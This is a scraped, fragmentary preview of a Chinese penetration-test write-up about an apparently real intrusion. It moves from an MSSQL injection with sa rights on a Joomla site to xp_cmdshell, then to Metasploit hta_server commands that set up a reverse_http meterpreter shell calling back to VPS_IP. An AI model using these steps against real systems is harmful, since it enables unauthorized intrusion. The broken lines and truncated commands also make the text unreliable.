原创力文档- 3
- 0
- 约5.62千字
- 约 19页
- 2026-04-23 发布于广东
- 举报
Jen
这次渗透是从站库分离的情况下在深入进去内网在拿下域控服务器,也都是普通
的渗透思路,并没有什么技术含量!首先WEB点是一个MSSQL注入漏洞,并且
这个注入是sa权限的!首先这个站点是使用JoomlaCMS搭建的,但是在一处
Study信息登记处发现了SQL注入漏洞
接着抓下此处查询的数据包进行注入,并且或者了是高权限,可以开启
xp_cmdshell来进行进一步的提权。在注入的返回的指纹信息可以获知对方的操
作系统大概率就是windows
Server
2012系统
公众号:渗透安全HackTwo
那么接下来不用想就是直接提权到MSF上面了,这里使用hta来提权到MSF
1msf5
use
exploit/windows/misc/hta_server
2msf5
exploit(windows/misc/hta_server)
set
payload
windows/meterpreter/r
everse_http
3payload
=
windows/meterpreter/reverse_http
4msf5
exploit(windows/misc/hta_server)
set
lhost
VPS_IP
文档评论(0)